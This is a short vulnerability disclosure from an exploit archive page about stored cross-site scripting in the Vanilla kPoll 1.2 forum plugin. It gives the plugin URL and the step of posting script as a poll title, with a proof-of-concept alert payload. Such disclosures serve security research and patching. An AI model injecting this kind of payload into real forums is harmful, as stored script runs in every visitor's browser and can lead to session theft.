Vanilla kPoll 1.2 Stored Cross Site Scripting

Vanilla kPoll 1.2 Stored Cross Site Scripting: Posted Jun 6, 2012; Authored by Henry Hoggard; Vanilla kPoll plugin version 1.2 suffers from a stored cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 9577d4d05fd0c60f1a6495210bcf2770b8279ce9336ad0be687891c55b8a2283; Download | Favorite | View

Vanilla kPoll 1.2 Stored Cross Site Scripting

# Title: Vanilla kPoll 1.2 Stored XSS
# Date: 5/6/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Vanilla kPoll 1.2
# http://vanillaforums.org/download
# http://vanillaforums.org/addon/kpoll-plugin
 
To Create the XSS go to this link,
 
http://vanilla.tld/index.php?p=/plugin/kPoll
 
Post your XSS as the poll title.
 
The XSS I used is
<script>alert('xss')</script>
 
#############################################################

Top Authors In Last 30 Days

Red Hat 175 files
Ubuntu 51 files
Debian 24 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Vanilla kPoll 1.2 Stored Cross Site Scripting

Vanilla kPoll 1.2 Stored Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Vanilla kPoll 1.2 Stored Cross Site Scripting

Share This

Vanilla kPoll 1.2 Stored Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems